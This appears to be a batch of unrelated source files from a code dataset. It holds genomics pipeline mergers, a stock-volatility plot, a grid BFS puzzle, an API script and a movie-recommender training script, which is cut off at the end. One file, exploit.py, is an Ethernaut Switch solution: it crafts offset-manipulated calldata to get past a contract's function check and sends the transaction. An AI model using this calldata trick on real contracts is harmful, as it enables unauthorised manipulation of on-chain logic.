(%response == $_responseCount){{\\n'\n '\\t\\t\\t^respond(~{name})\\n'\n '\\t\\t}}\\n'\n '\\t}}\\n'\n ).format(name=self.name+'_gen', max_return=self.max_return_code)\n\n # create plurals to keywords\n plurals = self.generate_keywords_plurals()\n # remove repeated words\n total_keywords = ' '.join(\n set(' '.join(self.keywords + plurals).split(' '))\n )\n\n top_header = (\n u'topic: ~{name} keep repeat {random}({keywords})\\n{default_rule}'\n ).format(\n name=self.name,\n random=self.random,\n keywords=total_keywords,\n default_rule=default_rule\n )\n\n return top_header + rules_text + '\\n\\n\\n' + search_rule_text\n","repo_name":"lplnufpi/chatscript_generator","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25286708797","text":"from Modules import Merger\n\nclass VCFMerger(Merger):\n\n def __init__(self, module_id, is_docker=False):\n super(VCFMerger, self).__init__(module_id, is_docker)\n self.output_keys = [\"vcf\"]\n\n def define_input(self):\n self.add_argument(\"vcf\", is_required=True)\n self.add_argument(\"snpsift\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=\"MAX\")\n self.add_argument(\"mem\", is_required=True, default_value=\"MAX\")\n\n # Conditionally require java if not docker\n if not self.is_docker:\n self.add_argument(\"java\", is_required=True, is_resource=True)\n\n def define_output(self):\n # Declare name of merged VCF output file\n vcf_out = self.generate_unique_file_name(extension=\".vcf\")\n self.add_output(\"vcf\", vcf_out)\n\n def define_command(self):\n # Get input arguments\n vcf_list = self.get_argument(\"vcf\")\n snpsift = self.get_argument(\"snpsift\")\n vcf_out = self.get_output(\"vcf\")\n\n # Generating JVM options\n if not self.is_docker:\n java = self.get_argument(\"java\")\n mem = self.get_argument(\"mem\")\n jvm_options = \"-Xmx%dG -Djava.io.tmpdir=/tmp/\" % (mem * 9 / 10)\n snpsift_cmd = \"{0} {1} -jar {2}\".format(java, jvm_options, snpsift)\n else:\n snpsift_cmd = str(snpsift)\n\n # Generating SnpEff command\n return \"{0} sort {1} > {2} !LOG2!\".format(snpsift_cmd, \" \".join(vcf_list), vcf_out)\n\n\nclass BGZipVCFMerger(Merger):\n\n def __init__(self, module_id):\n super(BGZipVCFMerger, self).__init__(module_id)\n self.output_keys = [\"vcf\"]\n\n def define_input(self):\n self.add_argument(\"vcf_gz\", is_required=True)\n self.add_argument(\"vcf_csi\", is_required=True)\n self.add_argument(\"bcftools\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=4)\n self.add_argument(\"mem\", is_required=True, default_value=\"nr_cpus*4\")\n\n def define_output(self):\n # Declare recoded VCF output filename\n vcf_out = self.generate_unique_file_name(extension=\".vcf\")\n self.add_output(\"vcf\", vcf_out)\n\n def define_command(self):\n # Get input arguments\n vcf_gz = self.get_argument(\"vcf_gz\")\n bcftools = self.get_argument(\"bcftools\")\n vcf_out = self.get_output(\"vcf\")\n # Get final normalized VCF output file path\n cmd = \"%s merge -F x %s > %s !LOG2!\" % (bcftools, \" \".join(vcf_gz), vcf_out)\n return cmd\n\n\nclass RecodedVCFMerger(Merger):\n\n def __init__(self, module_id, is_docker=False):\n super(RecodedVCFMerger, self).__init__(module_id, is_docker)\n self.output_keys = [\"recoded_vcf\"]\n\n def define_input(self):\n self.add_argument(\"recoded_vcf\", is_required=True)\n self.add_argument(\"cat_recoded_vcf\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=8)\n self.add_argument(\"mem\", is_required=True, default_value=16)\n\n def define_output(self):\n # Declare merged samtools depth output filename\n recoded_vcf_out = self.generate_unique_file_name(extension=\".recoded.vcf.txt\")\n self.add_output(\"recoded_vcf\", recoded_vcf_out)\n\n def define_command(self):\n cat_recode_vcf = self.get_argument(\"cat_recoded_vcf\")\n recode_vcf_in = self.get_argument(\"recoded_vcf\")\n recode_vcf_out = self.get_output(\"recoded_vcf\")\n\n # Generate cat recoded VCF command\n\n # Install pyvcf prior to runtime if not running in docker\n if not self.is_docker:\n return \"sudo pip install -U pyvcf ; python %s -i %s -vvv --output %s !LOG2!\" % (cat_recode_vcf, \" \".join(recode_vcf_in), recode_vcf_out)\n\n # Otherwise just let it rip\n return \"%s -i %s -vvv --output %s !LOG2!\" % (cat_recode_vcf, \" \".join(recode_vcf_in), recode_vcf_out)\n\n\nclass VCFSummaryMerger(Merger):\n def __init__(self, module_id, is_docker=False):\n super(VCFSummaryMerger, self).__init__(module_id, is_docker)\n self.output_keys = [\"vcf_summary\"]\n\n def define_input(self):\n self.add_argument(\"vcf_summary\", is_required=True)\n self.add_argument(\"cat_vcf_summary\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=8)\n self.add_argument(\"mem\", is_required=True, default_value=16)\n\n def define_output(self):\n # Declare merged samtools depth output filename\n vcf_summary_out = self.generate_unique_file_name(extension=\".summary.txt\")\n self.add_output(\"vcf_summary\", vcf_summary_out)\n\n def define_command(self):\n cat_vcf_summary = self.get_argument(\"cat_vcf_summary\")\n vcf_summary_in = self.get_argument(\"vcf_summary\")\n vcf_summary_out = self.get_output(\"vcf_summary\")\n\n # Generate command to merge VCF summaries\n\n # Install pyVCF before running if not running in Docker\n if not self.is_docker:\n return \"sudo pip install -U pyvcf ; python %s -i %s -vvv > %s !LOG2!\" % (cat_vcf_summary, \" \".join(vcf_summary_in), vcf_summary_out)\n\n return \"%s -i %s -vvv > %s !LOG2!\" % (cat_vcf_summary, \" \".join(vcf_summary_in), vcf_summary_out)","repo_name":"alexwaldrop/GAP","sub_path":"Modules/Mergers/VCFMergers.py","file_name":"VCFMergers.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9262809328","text":"from ethpwn import *\n\ndef p256(x):\n return x.to_bytes(32, 'big')\n\nswitch = contract_registry().get(contract_by_label('SwitchInstance0'))\nassert switch is not None\n\nimport ipdb; ipdb.set_trace()\noffset = 0x20 + 0x20 + 4\ncalldata = b''.join([\n keccak256('flipSwitch(bytes)')[:4],\n\n # offset starts calculating from here (bytes object is `offset -> (len, data)`)\n p256(offset), # first 0x20 skips this\n\n # fake data: 0x20 + 4 bytes\n p256(0x20),\n keccak256('turnSwitchOff()')[:4],\n\n # actual data here @ 0x20+0x20+4\n p256(0x20),\n keccak256('turnSwitchOn()')[:4],\n])\n\n# debug_simulated_transaction(\n# encode_transaction(\n# to=switch.address,\n# data=calldata,\n# from_addr=context.default_from_addr,\n# )\n# )\ntx_hash, *tx_extra = transact(to=switch.address, data=calldata, force=True)\n# debug_onchain_transaction(tx_hash)","repo_name":"Lukas-Dresel/ethernaut-ethpwn-solutions","sub_path":"switch/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18387907896","text":"import numpy as np\nimport pandas_datareader as pdr\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nstart = dt.datetime(2020, 1, 1)\ndata = pdr.get_data_yahoo(\"NFLX\", start)\n\n\"\"\" The Average True Range (ATR) is a moving average of the True Range (TR).\n And the TR is given by the maximum of the current high (H) minus current low (L), \n the absolute value of current high (H) minus previous close (Cp), \n and the absolute value of current low (L) and previous close (Cp). \"\"\"\n\n# using .shift() to get the previous close\nhigh_low = data['High'] - data['Low']\nhigh_cp = np.abs(data['High'] - data['Close'].shift())\nlow_cp = np.abs(data['Low'] - data['Close'].shift())\n\n# creating data frame with max values\ndf = pd.concat([high_low, high_cp, low_cp], axis=1)\ntrue_range = np.max(df, axis=1)\n\n# ATR as moving average\naverage_true_range = true_range.rolling(14).mean()\n\n# visualisation of the data on the simple chart\nfig, ax = plt.subplots()\naverage_true_range.plot(ax=ax)\nax2 = data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)\nax.set_ylabel(\"ATR\")\nax2.set_ylabel(\"Price\")\nplt.show()\n\n\n\n\n\n\n\n\n","repo_name":"vid962/ATR-Stocks-Volatilyty-Pandas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33672208201","text":"from collections import deque\nimport copy\nn, m = map(int, input().split())\n\nvirus = []\nlab = []\nno_safe = 0\nfor i in range(n):\n row = list(map(int, input().split()))\n for j, v in enumerate(row):\n if v == 2:\n virus.append((i, j))\n no_safe += 1\n elif v == 1:\n no_safe += 1\n \n lab.append(row)\n\ndef bfs(start, lab_copy, n, m):\n q = deque([])\n dx = [1, -1, 0, 0]\n dy = [0, 0, 1, -1]\n q.append(start)\n cnt = 0\n while q:\n x, y = q.popleft()\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < m and lab_copy[nx][ny] == 0:\n lab_copy[nx][ny] = 2\n q.append((nx,ny))\n cnt += 1\n return cnt\nsafe = 0\nfor i in range(n*m):\n for j in range(i+1, n*m):\n for k in range(j+1, n*m):\n if lab[i//m][i%m] != 0 or lab[j//m][j%m] != 0 or lab[k//m][k%m] != 0:\n continue\n lab_copy = copy.deepcopy(lab)\n lab_copy[i//m][i%m] = 1\n lab_copy[j//m][j%m] = 1\n lab_copy[k//m][k%m] = 1\n\n no_safe_part = 3\n for v in virus:\n no_safe_part += bfs(v, lab_copy, n, m)\n\n safe = max(safe, n*m-no_safe-no_safe_part)\nprint(safe)","repo_name":"hursuk1/coding_test","sub_path":"dfs, bfs/14502.py","file_name":"14502.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25732057262","text":"#!/usr/bin/python3\n\"\"\"\ntask0\n\"\"\"\n\n\nimport json\nimport requests\nfrom sys import argv\nif __name__ == '__main__':\n url = \"https://jsonplaceholder.typicode.com/users/\"\n url102 = \"https://jsonplaceholder.typicode.com/todos/\"\n employe = int(argv[1])\n user = requests.get(url + \"{}\".format(int(argv[1])))\n nom = user.json().get('name')\n kraya = requests.get(url102, params={\"userId\": argv[1]})\n matiere = kraya.json()\n mat_thazet = 0\n mat_gen = 0\n tabledemat = []\n for z in matiere:\n mat_gen += 1\n if z.get('completed'):\n mat_thazet += 1\n tabledemat.append(z.get(\"title\"))\n print('Employee {} is done with tasks({}/{}):'\n .format(nom, mat_thazet, mat_gen))\n for i in range(0, len(tabledemat)):\n print(\"\\t \" + tabledemat[i])\n","repo_name":"medcharfi96/holberton-system_engineering-devops","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72326379362","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental.preprocessing import StringLookup\nfrom ast import literal_eval\nimport re\nfrom tensorflow.python.keras.layers.advanced_activations import ReLU\n# from tensorflow.python.framework.ops import disable_eager_execution\n# disable_eager_execution()\n\nCSV_HEADER = [\"user_id\",\"occupation\",\"gender\",\"age\",\"age_squared\",\"age_power_3\",\"city\",\"state\",\"longitude\",\"latitude\",\"timezone\",\"watched_movies\",\"liked\",\"disliked\",\n \"watched_genres\",\"released\",\"movie_names\",\"days\",\"months\",\"years\",\"label\"]\nTARGET_FEATURE_NAME = \"label\"\n\n#get data\ntrain_data = pd.read_pickle(\"candidate_train_data.pkl\")\nval_data = pd.read_pickle(\"candidate_val_data.pkl\")\ntest_data = pd.read_pickle(\"candidate_test_data.pkl\")\n\n#print(train_data.head(10))\n# print(test_data.head(10))\n\n#train_data = train_data.drop([x for x in range(49000,49033)])\n\n#coverting the string back to a list and then to a np.array for the tensor\n\ndef find_words(data):\n data[\"movie_words\"] = data[\"movie_names\"].apply(lambda x: \" \".join(x))\n data[\"movie_words\"] = data[\"movie_words\"].apply(lambda x: re.findall(r\"[\\w'.]+\",x)) \n\nfind_words(train_data)\nfind_words(val_data)\nfind_words(test_data)\n#print(train_data[\"movie_words\"])\n# zip code from object to int\n# train_data[\"zip_code\"] = train_data[\"zip_code\"].apply(lambda x: int(x))\n# test_data[\"zip_code\"] = test_data[\"zip_code\"].apply(lambda x: int(x))\n\n# print(train_data.dtypes)\n# print(test_data.dtypes)\n\nall_movie_list =[]\nall_words_list =[]\ndef get_all_movie_names(data):\n for movie_list in data[\"movie_names\"]:\n for name in movie_list:\n if not(name in all_movie_list):\n all_movie_list.append(name)\n all_words_list.extend(re.findall(r\"[\\w'.]+\", name))\n\nget_all_movie_names(train_data)\nget_all_movie_names(val_data)\nget_all_movie_names(test_data)\nall_words_list = list(set(all_words_list))\n\ncity_list = []\nstate_list = []\ndef get_city_and_state(data):\n for city, state in zip(data[\"city\"],data[\"state\"]):\n if city not in city_list:\n city_list.append(city)\n if state not in state_list:\n state_list.append(state)\n\nget_city_and_state(train_data)\nget_city_and_state(val_data)\nget_city_and_state(test_data)\n\n#print(all_movie_list)\n#print(\"length of all_movie_list: \", len(all_movie_list))\n#number of movies\nTARGET_FEATURE_LABELS = [x for x in range(1682)]\nNUMERIC_FEATURE_NAMES = [\"age\",\n \"age_squared\",\n \"age_power_3\",\n \"timezone\",\n \"longitude\",\n \"latitude\",\n \"days\",\n \"months\",\n \"years\",\n ]\nNUM_LIST_FEATURE_NAMES = [\"watched_movies\", \"liked\",\n \"disliked\",\n \"watched_genres\",\n \"released\"\n ]\nCAT_LIST_FEATURE_WITH_VOCABULARY = {\n \"movie_names\": all_movie_list,\n \"movie_words\": all_words_list,\n}\nCATEGORICAL_FEATURES_WITH_VOCABULARY = {\n \"gender\": [\"M\",\"F\"],\n \"occupation\": [\"administrator\",\"artist\",\"doctor\",\"educator\",\"engineer\",\"entertainment\",\"executive\",\"healthcare\",\"homemaker\",\"lawyer\",\"librarian\",\"marketing\",\n \"none\",\"other\",\"programmer\",\"retired\",\"salesman\",\"scientist\",\"student\",\"technician\",\"writer\"], \n \"city\": city_list,\n \"state\": state_list,\n}\n\n\nCATEGORICAL_FEATURE_NAMES = list(CATEGORICAL_FEATURES_WITH_VOCABULARY.keys())\nCAT_LIST_FEATURE_NAMES = list(CAT_LIST_FEATURE_WITH_VOCABULARY.keys())\nFEATURE_NAMES = NUMERIC_FEATURE_NAMES + CATEGORICAL_FEATURE_NAMES + NUM_LIST_FEATURE_NAMES + CAT_LIST_FEATURE_NAMES #+ TIME_LIST\n\nNUM_CLASSES = len(TARGET_FEATURE_LABELS)+1\n\n#learning_rate = 0.0015\nlearning_rate = 0.00004\ndropout_rate = 0.05\nnum_batch_size = 8000\n#batch_size = 265\nnum_epochs = 800\nembedding_tall = 128\nembedding_medium = 16\nembedding_small = 8\n\n#init_learning_rate = 0.006\n\nhidden_units_deep = [256,128,64]\nhidden_units_cross = [1,2,3]\nhidden_units_dlrm_top = [1024,512,256]\nhidden_units_dlrm_bottom = [1024,512,256]\n\ndef create_model_inputs():\n inputs = {}\n for feature_name in FEATURE_NAMES:\n if feature_name in NUMERIC_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(), dtype=tf.float32\n )\n elif feature_name in NUM_LIST_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(None, ), dtype=tf.float32\n )\n # elif feature_name in TIME_LIST:\n # inputs[feature_name] = layers.Input(\n # name=feature_name, shape=(None, ), dtype=tf.float32\n # ) \n elif feature_name in CAT_LIST_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(None, ), dtype=tf.string\n )\n elif feature_name in CATEGORICAL_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(),dtype=tf.string\n )\n return inputs\n\ndef encode_inputs(inputs, style, use_embedding=False):\n encoded_features = []\n #print(inputs)\n for feature_name in inputs:\n #print(feature_name)\n if feature_name in CATEGORICAL_FEATURE_NAMES:\n vocabulary = CATEGORICAL_FEATURES_WITH_VOCABULARY[feature_name]\n # Create a lookup to convert string values to an integer indices.\n lookup = StringLookup(\n output_mode=\"int\" if use_embedding else \"binary\",\n vocabulary=vocabulary,\n mask_token=None,\n num_oov_indices=0,\n )\n if use_embedding:\n # Covert the string to integer indices \n encoded_feature = lookup(inputs[feature_name])\n #print(encoded_feature)\n embedding = layers.Embedding(\n input_dim=len(vocabulary), output_dim=embedding_small, input_length=1\n )\n encoded_feature = embedding(encoded_feature)\n #print(encoded_feature)\n if style == \"mean\":\n encoded_feature = tf.expand_dims(encoded_feature, -1)\n encoded_feature = tf.math.reduce_mean(encoded_feature,axis=1,name=\"mean\")\n #print(encoded_feature)\n \n if style == \"sum\":\n encoded_feature = tf.expand_dims(encoded_feature, -1)\n encoded_feature = tf.math.reduce_sum(encoded_feature,axis=1,name=\"sum\")\n \n else:\n # use lookup as is\n encoded_feature = lookup(tf.expand_dims(inputs[feature_name], -1))\n \n elif feature_name in NUM_LIST_FEATURE_NAMES:\n #list already padded\n if feature_name == \"watched_genres\":\n embedding = layers.Embedding(\n input_dim=19, output_dim=embedding_tall, mask_zero=True\n )\n if feature_name == \"released\":\n embedding = layers.Embedding(\n input_dim=2000, output_dim=embedding_tall, mask_zero=True\n )\n else:\n embedding = layers.Embedding(\n input_dim=NUM_CLASSES, output_dim=embedding_tall, mask_zero=True\n )\n \n if style == \"mean\":\n encoded_feature = tf.math.reduce_mean(embedding(inputs[feature_name]),axis=1,name=\"mean\")\n #print(encoded_feature)\n #encoded_feature = tf.expand_dims(encoded_feature, -1)\n \n if style == \"sum\":\n encoded_feature = tf.math.reduce_sum(embedding(inputs[feature_name]),axis=1,name=\"sum\")\n #encoded_feature = tf.expand_dims(encoded_feature, -1)\n \n # elif feature_name in TIME_LIST:\n # if feature_name == \"days\":\n # embedding = layers.Embedding(\n # input_dim=32, output_dim = 2, mask_zero=True\n # )\n # elif feature_name == \"months\":\n # embedding = layers.Embedding(\n # input_dim=13, output_dim = 2, mask_zero=True\n # )\n # elif feature_name == \"years\":\n # embedding = layers.Embedding(\n # input_dim=2000, output_dim = 4, mask_zero=True\n # )\n # if style == \"mean\":\n # encoded_feature = tf.math.reduce_mean(embedding(inputs[feature_name]),axis=1,name=\"mean\")\n # #print(encoded_feature)\n # #encoded_feature = tf.expand_dims(encoded_feature, -1)\n \n # if style == \"sum\":\n # encoded_feature = tf.math.reduce_sum(embedding(inputs[feature_name]),axis=1,name=\"sum\")\n # #encoded_feature = tf.expand_dims(encoded_feature, -1)\n\n elif feature_name in CAT_LIST_FEATURE_NAMES:\n \n vocabulary = CAT_LIST_FEATURE_WITH_VOCABULARY[feature_name]\n lookup = StringLookup(\n output_mode=\"int\" if use_embedding else \"binary\",\n vocabulary=vocabulary,\n mask_token=None,\n num_oov_indices=0,\n #oov_token= 0, \n )\n encoded_feature = lookup(inputs[feature_name])\n encoded_feature = tf.where(tf.equal(encoded_feature,-1),0,tf.cast(encoded_feature,dtype=tf.int32))\n if feature_name == \"movie_names\":\n embedding = layers.Embedding(\n input_dim=NUM_CLASSES, output_dim=embedding_medium, mask_zero=True\n )\n else: \n embedding = layers.Embedding(\n input_dim=len(vocabulary)+1, output_dim=embedding_medium, mask_zero=True\n )\n if style == \"mean\":\n encoded_feature = tf.math.reduce_mean(embedding(encoded_feature),axis=1,name=\"mean\")\n \n if style == \"sum\":\n encoded_feature = tf.math.reduce_sum(embedding(encoded_feature),axis=1,name=\"sum\")\n\n else:\n # Use the numerical features as-is.\n encoded_feature = tf.expand_dims(tf.cast(inputs[feature_name], tf.float32), -1)\n #print(encoded_feature)\n encoded_features.append(encoded_feature)\n #print(encoded_features)\n\n all_features = layers.concatenate(encoded_features)\n #print(all_features)\n return all_features\n\ndef run_experiment(model):\n\n # def loss_function(y_true,y_pred):\n # print(y_true)\n # output_layer = model.layers[-1]\n # loss = tf.nn.sampled_softmax_loss(\n # weights = tf.transpose(output_layer.weights[0]),\n # biases = output_layer.weights[1],\n # labels = y_true, \n # inputs = output_layer.input,\n # num_sampled=1400,\n # num_classes= 1682,\n # num_true= 1, \n # )\n # return loss \n # lr_schedule = keras.optimizers.schedules.ExponentialDecay(\n # init_learning_rate,\n # decay_steps=30,\n # decay_rate=0.95,\n # staircase=True\n # )\n\n class TerminateOnBaseline(keras.callbacks.Callback):\n \"\"\"Callback that terminates training when either acc or val_acc reaches a specified baseline\n \"\"\"\n def __init__(self, monitor='val_sparse_categorical_accuracy', baseline=0.022):\n super(TerminateOnBaseline, self).__init__()\n self.monitor = monitor\n self.baseline = baseline\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n acc = logs.get(self.monitor)\n if acc is not None:\n if acc >= self.baseline:\n print('Epoch %d: Reached baseline, terminating training' % (epoch))\n self.model.stop_training = True\n\n model.compile(\n optimizer=keras.optimizers.Adam(learning_rate=learning_rate),\n loss=keras.losses.SparseCategoricalCrossentropy(),\n metrics=[keras.metrics.SparseCategoricalAccuracy()],\n experimental_run_tf_function = False,\n )\n # print(np.shape(train_data[\"age\"].values))\n #print(np.shape(train_data[\"zip_code\"].values))\n # print(np.shape(train_data[\"gender\"].values))\n # print(np.shape(train_data[\"occupation\"].values))\n # print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_movies\"])))\n # print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"liked\"])))\n # print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"disliked\"])))\n # print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_genres\"])))\n \n\n input = {\"age\": train_data[\"age\"].values,\n \"age_squared\":train_data[\"age_squared\"].values,\n \"age_power_3\":train_data[\"age_power_3\"].values,\n \"longitude\": train_data[\"longitude\"].values,\n \"latitude\": train_data[\"latitude\"].values,\n \"timezone\": train_data[\"timezone\"].values,\n \"city\": train_data[\"city\"].values,\n \"state\": train_data[\"state\"].values,\n \"gender\": train_data[\"gender\"].values,\n \"occupation\": train_data[\"occupation\"].values,\n \"watched_movies\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_movies\"]),\n \"liked\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"liked\"]),\n \"disliked\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"disliked\"]),\n \"watched_genres\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_genres\"]),\n \"released\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"released\"]),\n \"days\": train_data[\"days\"].values,\n \"months\": train_data[\"months\"].values,\n \"years\": train_data[\"years\"].values,\n \"movie_names\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"movie_names\"],dtype=object,value=\"yyy\"), \n \"movie_words\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"movie_words\"],dtype=object,value=\"yyy\"), \n }\n \n target = train_data[\"label\"].values\n\n val_input = {\"age\": val_data[\"age\"].values,\n \"age_squared\":val_data[\"age_squared\"].values,\n \"age_power_3\":val_data[\"age_power_3\"].values,\n \"longitude\": val_data[\"longitude\"].values,\n \"latitude\": val_data[\"latitude\"].values,\n \"timezone\": val_data[\"timezone\"].values,\n \"city\": val_data[\"city\"].values,\n \"state\": val_data[\"state\"].values,\n \"gender\": val_data[\"gender\"].values,\n \"occupation\": val_data[\"occupation\"].values,\n \"watched_movies\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"watched_movies\"]),\n \"liked\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"liked\"]),\n \"disliked\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"disliked\"]),\n \"watched_genres\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"watched_genres\"]),\n \"released\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"released\"]),\n \"days\": val_data[\"days\"].values,\n \"months\": val_data[\"months\"].values,\n \"years\": val_data[\"years\"].values,\n \"movie_names\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"movie_names\"],dtype=object,value=\"yyy\"), \n \"movie_words\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"movie_words\"],dtype=object,value=\"yyy\"), \n }\n \n val_target = val_data[\"label\"].values\n print(\"Start training the model...\")\n history = model.fit(x=input,y=target,epochs=num_epochs,validation_data=(val_input,val_target),batch_size=num_batch_size,\n callbacks=TerminateOnBaseline(\"val_sparse_categorical_accuracy\",0.022),\n shuffle=True)\n print(\"Model training finished\")\n\n fig, (ax1,ax2) = plt.subplots(1,2)\n ax1.plot(history.history[\"sparse_categorical_accuracy\"],label=\"train\")\n ax1.plot(history.history[\"val_sparse_categorical_accuracy\"],label=\"validation\")\n ax1.legend(loc=\"upper left\")\n ax1.set_xlabel(\"epoch\")\n ax1.set_ylabel(\"sparse categortical accuracy\")\n ax1.set_title(\"model accuracy\")\n\n\n ax2.plot(history.history[\"loss\"],label=\"train\")\n ax2.plot(history.history[\"val_loss\"],label=\"validation\")\n ax2.legend(loc=\"upper right\")\n ax2.set_xlabel(\"epoch\")\n ax2.set_ylabel(\"loss\")\n ax2.set_title(\"model loss\")\n #fig.set_legend([\"training\",\"validation\"])\n plt.show()\n \n input = {\"age\": test_data[\"age\"].values,\n \"age_squared\":test_data[\"age_squared\"].values,\n \"age_power_3\":test_data[\"age_power_3\"].values,\n \"longitude\": test_data[\"longitude\"].values,\n \"latitude\": test_data[\"latitude\"].values,\n \"timezone\": test_data[\"timezone\"].values,\n \"city\": test_data[\"city\"].values,\n \"state\": test_data[\"state\"].values,\n \"gender\": test_data[\"gender\"].values,\n \"occupation\": test_data[\"occupation\"].values,\n \"watched_movies\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"watched_movies\"]),\n \"liked\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"liked\"]),\n \"disliked\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"disliked\"]),\n \"watched_genres\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"watched_genres\"]),\n \"released\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"released\"]),\n \"days\": test_data[\"days\"].values,\n \"months\": test_data[\"months\"].values,\n \"years\": test_data[\"years\"].values,\n \"movie_names\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"movie_names\"],dtype=object,value=\"yyy\"),\n \"movie_words\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"movie_words\"],dtype=object,value=\"yyy\"), \n }\n\n target = test_data[\"label\"].values\n\n _, accuracy = model.evaluate(x=input,y=target, batch_size = 20, verbose = 2)\n print(f\"Test accuracy: {round(accuracy*100, 2)}%\")\n print(\"learning rate:\", learning_rate)\n print(\"batch size:\", num_batch_size)\n\n model.save(\"model_candidate\")\n\n\ndef create_dlrm_inputs():\n num_inputs = {}\n cat_inputs = {}\n for feature_name in NUMERIC_FEATURE_NAMES:\n num_inputs[feature_name] = layers.Input(name=feature_name, shape=(), dtype=tf.float32)\n for feature_name in CATEGORICAL_FEATURE_NAMES:\n cat_inputs[feature_name] = layers.Input(name=feature_name, shape = (), dtype = tf.string)\n return num_inputs, cat_inputs\n\ndef create_wide_and_deep_model():\n inputs = create_model_inputs()\n wide = encode_inputs(inputs, style=\"mean\", use_embedding=False)\n wide = layers.BatchNormalization()(wide)\n\n deep = encode_inputs(inputs, style=\"mean\", use_embedding=True)\n deep = layers.BatchNormalization()(deep)\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n merged = layers.concatenate([wide,deep])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs=inputs, outputs=outputs)\n return model\n\ndef create_deep_and_cross_model():\n\n inputs = create_model_inputs()\n x0 = encode_inputs(inputs, style=\"mean\", use_embedding=True)\n\n cross = x0\n for _ in hidden_units_cross:\n units = cross.shape[-1]\n x = layers.Dense(units)(cross)\n cross = x0 * x + cross\n cross = layers.BatchNormalization()(cross)\n\n deep = x0\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n merged = layers.concatenate([cross, deep])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs=inputs, outputs=outputs)\n return model\n\ndef create_deep_and_cross_model_stacked():\n\n inputs = create_model_inputs()\n x0 = encode_inputs(inputs, style=\"mean\", use_embedding=True)\n\n cross = x0\n for _ in hidden_units_cross:\n units = cross.shape[-1]\n x = layers.Dense(units)(cross)\n cross = x0 * x + cross\n cross = layers.BatchNormalization()(cross)\n cross = layers.ReLU()(cross)\n\n deep = cross\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n stack = deep\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(stack)\n model = keras.Model(inputs=inputs, outputs=outputs)\n \n return model\n\ndef create_dlrm_model():\n num_inputs, cat_inputs = create_dlrm_inputs()\n embedding_outputs_list = []\n\n for key in CATEGORICAL_FEATURE_NAMES:\n embedding_outputs_list.append(encode_inputs({key: cat_inputs[key]}, True))\n num_encoded_inputs = encode_inputs(num_inputs)\n\n interaction_inputs = []\n\n for deep in embedding_outputs_list:\n for units in 